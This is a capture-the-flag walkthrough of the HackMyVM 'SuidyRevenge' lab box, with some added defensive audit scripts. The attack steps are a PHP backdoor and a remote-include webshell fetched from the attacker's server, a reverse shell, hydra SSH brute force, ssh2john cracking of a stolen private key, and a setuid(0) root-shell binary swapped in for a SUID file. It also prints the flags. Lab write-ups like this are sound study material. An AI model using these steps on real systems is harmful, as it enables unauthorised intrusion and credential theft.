HackMyVM | SuidyRevenge

In this walkthrough, I demonstrate how I obtained complete ownership of SuidyRevenge from HackMyVM.
In: HackMyVM, Attack, CTF, Home Lab, Linux, Hard Challenge
ℹ️
I keep all of my untrusted hosts from platforms like HackMyVM on a segmented VLAN -- 10.9.9.0/24 -- that has no internet access.

Nmap Results

# Nmap 7.94SVN scan initiated Fri Nov 22 18:42:29 2024 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.12
Nmap scan report for 10.9.9.12
Host is up (0.00043s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 99:04:21:6d:81:68:2e:d7:fe:5e:b2:2c:1c:a2:f5:3d (RSA)
|   256 b2:4e:c2:91:2a:ba:eb:9c:b7:26:69:08:a2:de:f2:f1 (ECDSA)
|_  256 66:4e:78:52:b1:2d:b6:9a:8b:56:2b:ca:e5:48:55:2d (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 22 18:42:37 2024 -- 1 IP address (1 host up) scanned in 7.99 seconds





Service Enumeration

TCP/80



Gobuster Enumeration

ℹ️
Some context on how I got to this point

I ran gobuster with some basic word lists like /usr/share/seclists/Discovery/Web-Content/big.txt and /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt and the -x php switch, but wasn't having any luck. So, then I had the bright idea to see if there's a word list for backdoors.
/simple-backdoor.php





Exploit

PHP Backdoor

💡
I tried establishing a reverse shell, but it seemed as if outbound connectivity was being blocked, so I tried for local file read instead.
The initial backdoor was behaving badly, and it seemed as if certain commands were blacklisted; simple enumeration revealed another backdoor.
The second backdoor supports RFI as well, which will allow me to upgrade to a PHP web shell of my preference.
curl -s https://raw.githubusercontent.com/WhiteWinterWolf/wwwolf-php-webshell/refs/heads/master/webshell.php -o pwn.php
sudo python3 -m http.server 80
Much more flexibility with this webshell
Reverse shell as www-data





Post-Exploit Enumeration

Operating Environment

OS & Kernel

PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

Linux suidyrevenge 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux    

Current User

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Sorry, user www-data may not run sudo on suidyrevenge.    



Users and Groups

Local Users

murda:x:1000:1000:murda,,,:/home/murda:/bin/bash
violent:x:1001:1001:,,,:/home/violent:/bin/bash
yo:x:1002:1002:,,,:/home/yo:/bin/bash
ruin:x:1003:1003:,,,:/home/ruin:/bin/bash
theuser:x:1004:1004:,,,:/home/theuser:/bin/bash
suidy:x:1005:1005:,,,:/home/suidy:/bin/bash    

Local Groups

cdrom:x:24:murda
floppy:x:25:murda
audio:x:29:murda
dip:x:30:murda
video:x:44:murda
plugdev:x:46:murda
netdev:x:109:murda
murda:x:1000:
violent:x:1001:
yo:x:1002:
ruin:x:1003:
theuser:x:1004:
suidy:x:1005:    



Network Configurations

Network Interfaces

ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether bc:24:11:34:4c:48 brd ff:ff:ff:ff:ff:ff
    inet 10.9.9.12/24 brd 10.9.9.255 scope global dynamic ens18
       valid_lft 5961sec preferred_lft 5961sec
    inet6 fe80::be24:11ff:fe34:4c48/64 scope link 
       valid_lft forever preferred_lft forever    



Interesting Files

/var/www/html/murdanote.txt

I always lost my password so Im using 
one password from rockyou.txt !

-murda    

/usr/bin/violent

-rwsr-sr-x 1 root violent 16608 Oct  1  2020 /usr/bin/violent

/home/suidy/suidyyyyy

-rwsrws--- 1 root theuser 16712 Oct  2  2020 /home/suidy/suidyyyyy
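A root-owned SUID binary sitting in a user's home directory is the root cause of what follows: replacing the file needs only write access to the directory, not to the file. The audit below is an added example, not part of the original write-up; it assumes GNU find and stat, and the demo tree, owners and modes are constructed.

```shell
# Added example (not from the original write-up): audit setuid/setgid files that
# sit in a directory an unprivileged user can write to. Replacing such a file
# only needs write access to the directory, not to the file itself, which is how
# /home/suidy/suidyyyyy can be swapped out. Assumes GNU find and stat.

# audit_suid_dirs ROOT [TRUSTED_OWNER]
# Prints one line per setuid/setgid file under ROOT whose parent directory is
# group- or world-writable, or is owned by someone other than TRUSTED_OWNER
# (default root). Output: "<file> <dir> <dir-owner> <dir-mode>".
audit_suid_dirs() {
    root=$1
    trusted=${2:-root}
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r f; do
        d=$(dirname "$f")
        # Flag the directory if its owner is untrusted or group/other may write.
        if [ -n "$(find "$d" -maxdepth 0 \( ! -user "$trusted" -o -perm -0020 -o -perm -0002 \) 2>/dev/null)" ]; then
            printf '%s %s %s %s\n' "$f" "$d" "$(stat -c %U "$d")" "$(stat -c %a "$d")"
        fi
    done
}

# Constructed demo tree: one setuid file in a 0755 directory, one in a 0777
# directory. Both are owned by the current user, so the current user is passed
# as the trusted owner to show only the writable-directory case being reported.
demo_audit() {
    base=$(mktemp -d)
    mkdir -p "$base/bin" "$base/home/suidy"
    chmod 0755 "$base/bin"
    chmod 0777 "$base/home/suidy"
    : > "$base/bin/safe"; chmod 4755 "$base/bin/safe"
    : > "$base/home/suidy/suidyyyyy"; chmod 6770 "$base/home/suidy/suidyyyyy"
    audit_suid_dirs "$base" "$(id -un)"
    rm -rf "$base"
}

demo_audit
```

Run `audit_suid_dirs /` as root on a real host to get the full list; on this box it would report /home/suidy/suidyyyyy because suidy owns the directory.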





Privilege Escalation

Lateral to Murda

During the post-exploit enumeration phase, we found the local user murda, in addition to the note in the web directory. The note indicates we should be able to find a login for the user in the rockyou.txt word list.

hydra -I -V -f -l murda -P ~/Pentest/WordLists/rockyou.txt ssh://10.9.9.12
ssh murda@10.9.9.12
💡
From here, we work back through the post-exploit enumeration process. In my initial checks, murda does not have sudo privileges on the box.
It seems like the SSH private key for violent is somewhere accessible to us. If I had to guess, the key is password protected, but we can crack it with ssh2john.
find / -type f -name 'id_rsa' 2>/dev/null

Easy way to find the file named id_rsa on the system



Lateral to Violent

scp murda@10.9.9.12:/usr/games/id_rsa ./id_rsa

Copy the id_rsa file to our attack box for analysis

Indeed, the key is protected by a passphrase
ssh2john id_rsa > hash
john --wordlist=rockyou.txt hash
Passphrase for the SSH key is ihateu
ssh -i id_rsa violent@10.9.9.12
💡
Once again, we repeat the post-exploit enumeration process.
Always a good idea to check upon switching user
Pretty uneventful. After transferring the file locally and inspecting it further, that's the extent of the application: it just prints a simple string to the console and exits.
At this point, I'm pretty stuck. I know I need to pivot and I'm pretty sure the next move is theuser, given the SUID binary in /home/suidy/suidyyyyy. But, I don't see any more clues or ways to pivot there from the current user.

Right now, the current list of users I haven't pivoted to are:

ruin
theuser
yo
suidy

So, I do some last ditch enumeration to find a way to pivot.
find / -type f \( -user yo -o -user ruin -o -user theuser -o -user suidy \) -exec ls -l {} \; 2>/dev/null
Try to find any interesting files owned by the remaining users, but there is nothing we have access to.
grep -ilarE '^yo$|ruin|theuser|suidy' / 2>/dev/null | grep -vE '/usr/(share|include)|/var/lib' | xargs ls -l
Look for the usernames in any files on the system. /var/log/wtmp just shows the last login for the users, so no valuable data other than a successful login. The only other interesting file is one we've already seen, /var/www/html/index.html
💡
Looking back at the text again, the phrase, "He only changed my password to a different ..." is a little bit suspicious.



Make a Custom Word List

cewl http://10.9.9.12 -w wordlist.txt
hydra -I -f -V -L users.txt -P wordlist.txt ssh://10.9.9.12
That's quite frustrating...



Lateral to theuser

ssh theuser@10.9.9.12



Lateral to suidy

Previous write-up: HackMyVM | suidy (in that walkthrough, I demonstrate how I obtained complete ownership of suidy from HackMyVM)

So, the privilege escalation is nearly the same as the previous box, but we need to ensure the compiled size of the binary is equal to the original.

Becoming Root

Replacing the Binary

⚠️
Exit your session as suidyyyyy, as you won't be able to replace the binary while the running SUID process holds the file open.
The compiled size of the original binary is 16712 bytes.
nano /tmp/suidyyyyy.c

I'm just going to try the payload from my original article and see what the compiled size turns out to be.

#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setgid(), setuid() */
#include <stdio.h>

/* Replacement for suidyyyyy: drop to a root shell when run with the SUID bit set. */
int main(void)
{
    setgid(0);              /* effective group -> root */
    setuid(0);              /* effective user  -> root */
    system("/bin/bash");    /* spawn the shell as root */
    return 0;
}
gcc -o /tmp/suidyyyyy /tmp/suidyyyyy.c
How convenient! The compiled size just happens to be identical.
With the file replaced, the script run by root set the SUID bit.
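The restore script on this box evidently accepts the replacement once the size matches, which is why matching 16712 bytes was enough. As an added example (not part of the original write-up), the functions below show that a size-only comparison passes a same-length substitute while a SHA-256 check rejects it; the two sample files are constructed and it assumes GNU coreutils (stat, sha256sum).

```shell
# Added example (not from the original write-up): a size-only integrity check
# versus a content hash, as a root-side script restoring u+s should use.
# Assumes GNU coreutils (stat, sha256sum). Sample files are constructed.

# size_matches ORIG CANDIDATE: true when both files have the same byte length.
size_matches() {
    [ "$(stat -c %s "$1")" -eq "$(stat -c %s "$2")" ]
}

# hash_matches ORIG CANDIDATE: true when both files have the same SHA-256.
hash_matches() {
    [ "$(sha256sum < "$1" | cut -d' ' -f1)" = "$(sha256sum < "$2" | cut -d' ' -f1)" ]
}

# verify_suid_binary BASELINE_SIZE BASELINE_SHA256 FILE
# What a careful restore script should do before setting u+s again:
# reject the file unless both size and hash match the recorded baseline.
verify_suid_binary() {
    [ "$(stat -c %s "$3")" -eq "$1" ] || return 1
    [ "$(sha256sum < "$3" | cut -d' ' -f1)" = "$2" ] || return 1
}

# Constructed demo: two files of identical length with different contents,
# standing in for the original suidyyyyy and its recompiled replacement.
demo_size_vs_hash() {
    base=$(mktemp -d)
    printf 'original binary content\n' > "$base/orig"
    printf 'replaced binary content\n' > "$base/swap"
    size=$(stat -c %s "$base/orig")
    sum=$(sha256sum < "$base/orig" | cut -d' ' -f1)
    s=no; h=no; vo=rejected; vs=rejected
    size_matches "$base/orig" "$base/swap" && s=yes
    hash_matches "$base/orig" "$base/swap" && h=yes
    verify_suid_binary "$size" "$sum" "$base/orig" && vo=ok
    verify_suid_binary "$size" "$sum" "$base/swap" && vs=ok
    rm -rf "$base"
    printf 'size=%s hash=%s orig=%s swap=%s\n' "$s" "$h" "$vo" "$vs"
}

demo_size_vs_hash
```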



Flags

User

HMVbisoususeryay    

Root

HMVvoilarootlala    
More from 0xBEN